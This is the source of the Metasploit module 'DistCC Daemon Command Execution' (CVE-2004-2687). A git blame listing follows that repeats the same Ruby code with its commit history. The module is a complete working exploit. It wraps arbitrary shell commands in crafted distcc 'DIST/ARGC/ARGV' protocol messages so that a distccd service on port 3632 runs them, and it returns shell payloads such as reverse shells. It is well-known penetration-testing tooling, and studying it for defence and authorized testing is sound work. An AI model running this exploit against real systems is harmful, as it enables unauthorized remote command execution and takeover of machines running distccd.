modules/exploits/unix/misc/distcc_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DistCC Daemon Command Execution',
      'Description'    => %q{
        This module uses a documented security weakness to execute
        arbitrary commands on any system running distccd.

      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-2687'],
          [ 'OSVDB', '13378' ],
          [ 'URL', 'http://distcc.samba.org/security.html'],

        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby bash telnet openssl bash-tcp',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2002-02-01'
      ))

      register_options(
        [
          Opt::RPORT(3632)
        ])
  end

  def check
    r = rand_text_alphanumeric(10)
    connect
    sock.put(dist_cmd("sh", "-c", "echo #{r}"))

    dtag = rand_text_alphanumeric(10)
    sock.put("DOTI0000000A#{dtag}\n")

    err, out = read_output
    if out && out.index(r)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    distcmd = dist_cmd("sh", "-c", payload.encoded);
    sock.put(distcmd)

    dtag = rand_text_alphanumeric(10)
    sock.put("DOTI0000000A#{dtag}\n")

    err, out = read_output

    (err || "").split("\n") do |line|
      print_status("stderr: #{line}")
    end
    (out || "").split("\n") do |line|
      print_status("stdout: #{line}")
    end

    handler
    disconnect
  end

  def read_output

    res = sock.get_once(24, 5)

    if !(res and res.length == 24)
      print_status("The remote distccd did not reply to our request")
      disconnect
      return
    end

    # Check STDERR
    res = sock.get_once(4, 5)
    res = sock.get_once(8, 5)
    len = [res].pack("H*").unpack("N")[0]

    return [nil, nil] if not len
    if (len > 0)
      err = sock.get_once(len, 5)
    end

    # Check STDOUT
    res = sock.get_once(4, 5)
    res = sock.get_once(8, 5)
    len = [res].pack("H*").unpack("N")[0]

    return [err, nil] if not len
    if (len > 0)
      out = sock.get_once(len, 5)
    end
    return [err, out]

  end


  # Generate a distccd command
  def dist_cmd(*args)

    # Convince distccd that this is a compile
    args.concat(%w{# -c main.c -o main.o})

    # Set distcc 'magic fairy dust' and argument count
    res = "DIST00000001" + sprintf("ARGC%.8x", args.length)

    # Set the command arguments
    args.each do |arg|
      res << sprintf("ARGV%.8x%s", arg.length, arg)
    end

    return res
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`def initialize(info = {})`
Report the correct local/peer names for the session information. Fix a return value check 2010-03-10 07:13:18 +00:00			`super(update_info(info,`
distcc 2006-01-21 05:05:19 +00:00			`'Name' => 'DistCC Daemon Command Execution',`
			`'Description' => %q{`
			`This module uses a documented security weakness to execute`
			`arbitrary commands on any system running distccd.`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`},`
			`'Author' => [ 'hdm' ],`
New licensing terms, revision bump to v3 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
distcc 2006-01-21 05:05:19 +00:00			`'References' =>`
			`[`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`[ 'CVE', '2004-2687'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '13378' ],`
distcc 2006-01-21 05:05:19 +00:00			`[ 'URL', 'http://distcc.samba.org/security.html'],`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`],`
			`'Platform' => ['unix'],`
Report the correct local/peer names for the session information. Fix a return value check 2010-03-10 07:13:18 +00:00			`'Arch' => ARCH_CMD,`
distcc 2006-01-21 05:05:19 +00:00			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'DisableNops' => true,`
Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits 2009-07-21 15:20:35 +00:00			`'Compat' =>`
			`{`
Fix #5659 : Update CMD exploits payload compatibility options 2015-08-10 17:12:59 -05:00			`'PayloadType' => 'cmd cmd_bash',`
			`'RequiredCmd' => 'generic perl ruby bash telnet openssl bash-tcp',`
Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits 2009-07-21 15:20:35 +00:00			`}`
distcc 2006-01-21 05:05:19 +00:00			`},`
Report the correct local/peer names for the session information. Fix a return value check 2010-03-10 07:13:18 +00:00			`'Targets' =>`
distcc 2006-01-21 05:05:19 +00:00			`[`
			`[ 'Automatic Target', { }]`
			`],`
add lots of disclosure dates from OSVDB 2010-07-03 03:13:45 +00:00			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2002-02-01'`
add lots of disclosure dates from OSVDB 2010-07-03 03:13:45 +00:00			`))`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(3632)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
distcc 2006-01-21 05:05:19 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`def check`
			`r = rand_text_alphanumeric(10)`
			`connect`
			`sock.put(dist_cmd("sh", "-c", "echo #{r}"))`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`dtag = rand_text_alphanumeric(10)`
			`sock.put("DOTI0000000A#{dtag}\n")`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`err, out = read_output`
Check nil 2018-07-26 11:23:16 -05:00			`if out && out.index(r)`
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`def exploit`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`distcmd = dist_cmd("sh", "-c", payload.encoded);`
			`sock.put(distcmd)`
Retab modules 2013-08-30 16:28:54 -05:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`dtag = rand_text_alphanumeric(10)`
distcc 2006-01-21 05:05:19 +00:00			`sock.put("DOTI0000000A#{dtag}\n")`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`err, out = read_output`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`(err \|\| "").split("\n") do \|line\|`
			`print_status("stderr: #{line}")`
			`end`
			`(out \|\| "").split("\n") do \|line\|`
			`print_status("stdout: #{line}")`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`handler`
			`disconnect`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`def read_output`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`res = sock.get_once(24, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`if !(res and res.length == 24)`
distcc 2006-01-21 05:05:19 +00:00			`print_status("The remote distccd did not reply to our request")`
			`disconnect`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`# Check STDERR`
			`res = sock.get_once(4, 5)`
			`res = sock.get_once(8, 5)`
			`len = [res].pack("H*").unpack("N")[0]`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`return [nil, nil] if not len`
distcc 2006-01-21 05:05:19 +00:00			`if (len > 0)`
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`err = sock.get_once(len, 5)`
distcc 2006-01-21 05:05:19 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`# Check STDOUT`
			`res = sock.get_once(4, 5)`
			`res = sock.get_once(8, 5)`
			`len = [res].pack("H*").unpack("N")[0]`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`return [err, nil] if not len`
distcc 2006-01-21 05:05:19 +00:00			`if (len > 0)`
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`out = sock.get_once(len, 5)`
distcc 2006-01-21 05:05:19 +00:00			`end`
Add a check for distcc_exec 2012-06-18 14:34:02 -06:00			`return [err, out]`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

distcc 2006-01-21 05:05:19 +00:00			`# Generate a distccd command`
			`def dist_cmd(*args)`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`# Convince distccd that this is a compile`
			`args.concat(%w{# -c main.c -o main.o})`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`# Set distcc 'magic fairy dust' and argument count`
			`res = "DIST00000001" + sprintf("ARGC%.8x", args.length)`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`# Set the command arguments`
			`args.each do \|arg\|`
			`res << sprintf("ARGV%.8x%s", arg.length, arg)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
distcc 2006-01-21 05:05:19 +00:00			`return res`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`